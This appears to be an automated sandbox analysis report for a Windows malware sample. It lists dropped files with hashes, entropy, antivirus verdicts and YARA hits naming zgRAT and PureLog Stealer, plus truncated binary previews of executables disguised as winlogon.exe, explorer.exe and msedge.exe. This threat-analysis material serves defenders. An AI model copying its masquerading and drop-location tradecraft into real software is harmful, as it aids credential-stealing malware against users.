                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*

                                                            C:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):1168
                                                            Entropy (8bit):4.448520842480604
                                                            Encrypted:false
                                                            SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                            MD5:B5189FB271BE514BEC128E0D0809C04E
                                                            SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                            SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                            SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                            Malicious:false
                                                            Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4608
                                                            Entropy (8bit):3.8727823458802355
                                                            Encrypted:false
                                                            SSDEEP:48:6Wgm0taxZ8RxeOAkFJOcV4MKe28dcvqBHnuulB+hnqXSfbNtm:I1xvxVx98vkZTkZzNt
                                                            MD5:DE4F6401D8D489EC917D7DC5D36FF8D4
                                                            SHA1:FD40F597A54C2432380ADB5CFCD5CD7A443CD968
                                                            SHA-256:260332C53DFA834E346F4838EF5BF9360F4F53E3FF07B42A076826FA3094C01D
                                                            SHA-512:4FE8C63732251E31F5E146567B08E731E62BE638F6F67D2B7ABF68EA535BD839B1E4E49B65D267D88BE16C7F6A3E973C9C0BCB1B7F381BEFE85CF32391037B83
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................~'... ...@....@.. ....................................@.................................$'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                            C:\ProgramData\SoftwareDistribution\cc11b995f2a76d

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with very long lines (387), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):387
                                                            Entropy (8bit):5.846870218789454
                                                            Encrypted:false
                                                            SSDEEP:6:OC6kEp+mqKjX31n32jLjWbNxVohnPVc3ccuF+pdzN/2BDpIsr7F8hFZu3BZQa:OC6fhV2jmBohtc3f62xwBDmsyhF0HB
                                                            MD5:E46A9356251ACDE28326FA3E8DE2DB15
                                                            SHA1:5E7F9E763E1E15E2DBA689ADFE7E7D09BD9FCE0A
                                                            SHA-256:7D9846BE6C026E210E4987E24F49BA6ED130FABD7EFED21BB45A2ED94C7EE735
                                                            SHA-512:4E4D4827B32275342C8753567A713BFA28C86FD321E4E7B32F0BD2BADC02168A293B4E777A1EC3CE7E910002D1D51F82F203FE4BF4E000F9E46587B119DA375B
                                                            Malicious:false
                                                            Preview:xvcdzAt9z07nJifQb7lhzAavG6taMQ6gtvjdNmjxb2jd4PNdLbcVC2hxUqX2RSxj4b3X8CCzYxF7b710sPOuxkd1NwJhPqgJFAicW0fJZm7OwkVWygKBDCvU7BJL3fksR51bZYe2uFVKnOEnawssgeFDOOfUqTQ3CO71s47ZCRR8rlqs7gvGw1Mw0yMK3JMazbHYRN4fySqONHWnhxXKiJGLCLB4rwg2F0JPdSbtlPSeL7iscjmGwB2pU6WFMAxBwyJW8GJPVnjT0mAFmSbIKaFD8d5g6VhkbQrXyMuWZXuJciyr6Qd3jp1VsFYfLnTAG82k5mQaiFswq6kZoNjp1nBvZVosyOLwDtCeqOwTADVd7Epvf807DoId6GLj8imT46s

                                                            C:\ProgramData\SoftwareDistribution\winlogon.exe

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\SoftwareDistribution\winlogon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\SoftwareDistribution\winlogon.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*

                                                            C:\Recovery\ea1d8f6d871115

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with very long lines (898), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):898
                                                            Entropy (8bit):5.893985052983247
                                                            Encrypted:false
                                                            SSDEEP:12:Nmrmz1vXVPlCyCs9xl9GMM5BY5KO1maGD7GkGfkilbkllEqOMWdcbTM2ZUzvdm4R:NmG1d9qSfARByP7I7eSEc3qzvMzo
                                                            MD5:440B078DDEBE215A5A6E7D5DE71A4880
                                                            SHA1:B7AFAC071F253C8F6E539B0877214598F3EB17FB
                                                            SHA-256:31F9E0ABA9AE39C5A7FB7EEB64AD54A79083F5F0D0D1116FFA8DBDE372A98B1B
                                                            SHA-512:7C95CDF42DB61C591E76EFD607AECF41DBCC6A39F61360A3C8233151CD61DC284D35CDF504942E507AAA8421717188A90187C345A110ABD2056FCF6129E7F5B7
                                                            Malicious:false
                                                            Preview:n3pOVPVSFx79QUXyUNNmRybUgUqiqgEGvIuQvlT7Xit24O7pOdga0lmzbUsAjxlis0OIjHCs3QPsEjaRXATNAnQKf4yb3SYj7KJDAyFGaygkW4u24anidXiFkDmoTlzl1pu4aWRi4NwLHpylK5gdozGklEd6Maxz85sqK0chIFoQkW84PBeYEV6CjJSW3UWdZ7NL7HbUc9UjKz9OFirK6Zvm9pHAhGnysL0nJw6HkK5EBW2uKDQUmLhALkLRAbwWVg098WFTmjkvdqlnxXzd0SLhn0bjloHJXjsff2vx87sClvgf8ienlTfDUTVI5fs7cbY48GH4lCe3kI52T6kCKdhEDpKLhm2dOvkJXmh2ajBjymcLXdz84pw93T1S55X8JBoyiwfqZsmkb8PaM8yDx3ij9kQDuO6eMDZx8oml8IjLDLh5DaF6HTLPcEz7fb6KwHYYjcciWMFpUWgxDVAUI9X21JU3yoFgMYY6xIWk7hk4Ng5FiC4KbmBxtfgZIjtrGjc58k948ZWlYcpVOOUwu5FkWlMSl6cYx3xoD9H8CALCPaYQ0LK4P76Le2iWXrSB68yepASOGWtutCU6M5bawiJ06lKKavkVrKFRm4lz25x2NMcbimKcP1PYz7iD0IyVvYCj7CUSUli0uQmtIslxkIF04qcoWh9tHbHzK3dgS1HoTZojVy4HhAumSMoRkp6wmysSIxjOPFfsAbgeC3Tim1MHrfg8PM5m5VBeqVaiOq2beBl1pJOrWYJulllnQl9CJ2xoZCyqcvT69ump3pTF7OQhMQ2EtxRnq0SmO6bnViOlEMv196tkS4E5mPcJJt6pdpQIc9a6OpuZ9pcAfBFxDqVvvWA8eRelliHY5mY9fwWmKp56xboHoJmwUeXG9cc6LI

                                                            C:\Recovery\upfc.exe

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\upfc.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\upfc.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*

                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\7a0fd90576e088

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):5.1723002472925526
                                                            Encrypted:false
                                                            SSDEEP:3:FkV1b+BsTmsEATsRspX5Py:FkLb+BsaygRsppK
                                                            MD5:D94451A88CDE7DA9777CEF3E06EC5470
                                                            SHA1:9E2A36F83C06041DF309AA46579E841F80CCA9B9
                                                            SHA-256:52804D2EF08FC825AC69C647779AC9DA8906FC4B30EB2A9E2130908EE204A7E6
                                                            SHA-512:6B1FBC3F956A9318F8260BEFF22110A793BE20F5B6C9F3FD4CA2D26054F3C924A9AFA1D79D2BA8014D1DCC095C69AC554D8EA2A4F5FCC9AE1EF3029C5A6FB496
                                                            Malicious:false
                                                            Preview:wZa9pp7cocpDHFNfGdIv14AGIwS5u6iWZssZun9TvI4KPKJJXOqGYyL2ZT13W

                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*

                                                            C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exe

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*

                                                            C:\Users\Default\Saved Games\c884dbb5960701

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with very long lines (335), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):335
                                                            Entropy (8bit):5.802392987223497
                                                            Encrypted:false
                                                            SSDEEP:6:qhnyng1SPepjZVUijRVcESSN8eV5CdpokIwU+Z2irOjdbdaLV2RufBnsyyx5Lq2:qhn4gcerV5RJSS6eRkNUr5djR/yyx5q2
                                                            MD5:4D3A07456E7C20718284A029EB62B89E
                                                            SHA1:105C0DA185A13581209F8ED9C9722367BF0B7704
                                                            SHA-256:66BD27C42638650F857E8273AB30A54C0589189885B84365C5D8203A3053628B
                                                            SHA-512:1A9AF1B5D187F9AC34C876FF37D9B91A3421F1D7AD04C91BD7490CB2AA164184D634C4117CD42D23CC5D43D78924793EDDF1E1AC9EED1D8E2CC64338BBABBC1E
                                                            Malicious:false
                                                            Preview:q3NzXNsZkjhkDNVbbBjBVs1YPbgx9UKYS02FVw5qNTVUjIWN4NXQ8w87Byk6r5aQYIRMUQFpF2yCWhzGES2v73af24DhL88R3F5a0J3oIrLG86ke8e2ZCoTeswUZNidG3gJRlYP5ZOnPsTg5UjirGjOOvasEydbkOEMcxT2jO6AyBDwYPYFn9w9US4fKqKG5xDAoHEIAq9cKjaMsoUyZXxkcE2K2xs3E0EB8CHQKQE7ATzv2sxfWVqiAcijP4QM7FYTeYNphDnJSzjIOHRJAMgsJgBgeiBQ91945gQdeI8SshPK2aUHmGMviqK8XrK8BXJb0pMs0yp1OOAm

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                                            Download File
                                                            Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\intoHostperf.exe.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1915
                                                            Entropy (8bit):5.363869398054153
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                            MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                            SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                            SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                            SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\upfc.exe.log

                                                            Download File
                                                            Process:C:\Recovery\upfc.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:NlllulxmH/lZ:NllUg
                                                            MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                            SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                            SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                            SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                            Malicious:false
                                                            Preview:@...e................................. ..............@..........

                                                            C:\Users\user\AppData\Local\Temp\RESD.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Mon Jan 13 14:14:40 2025, 1st section name ".debug$S"
                                                            Category:dropped
                                                            Size (bytes):1944
                                                            Entropy (8bit):4.534344617726197
                                                            Encrypted:false
                                                            SSDEEP:24:HohC9TOvPbHjwKvNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:WvzUKvEluOulajfqXSfbNtmhBZ
                                                            MD5:98690343126CE52AB0175102043E7938
                                                            SHA1:AAB9F0E3160379D98D558F69E5363CB872409FAC
                                                            SHA-256:4085CE5B3DFFB90EABB2EA2E1F8969F4E94AD7CE9FCC0130D5C146A4DB422D51
                                                            SHA-512:D7BAE7EBA228817BB1192584FFEF91B0C9D7A49BBDD578865FA7837DFC10D68C250B76A5438838CE6AD57955841A394916A487A307A9666C7A5E926F0171CDF6
                                                            Malicious:false
                                                            Preview:L......g.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........=....c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP.....................r.av..t.y..............2.......C:\Users\user\AppData\Local\Temp\RESD.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\Browserhost.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.

                                                            C:\Users\user\AppData\Local\Temp\RESFE67.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c8, 10 symbols, created Mon Jan 13 14:14:40 2025, 1st section name ".debug$S"
                                                            Category:dropped
                                                            Size (bytes):1920
                                                            Entropy (8bit):4.598806000568403
                                                            Encrypted:false
                                                            SSDEEP:24:Ho5zW9rLzUWFl4PHNFwKvN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+2cN:nLzUa4PEKvilmuulB+hnqXSfbNtmhj
                                                            MD5:D6A0FB2D894C6BE1407F907E74FB7B66
                                                            SHA1:CA19C56711751484BD2B58DB367300CBA34EADB0
                                                            SHA-256:6973A97260E7F677E8F74711FF22A26E0F5BB7F0E58A33C77A3F35E86DE4B1EA
                                                            SHA-512:8D6A1920FE957056CEE08DB5C94E7ECE7D8F6498643E58207863E26FB50640E986D2644C9394F8B7F6DA564497FE71A4557210AB6422E632B285FB915BEF4F68
                                                            Malicious:false
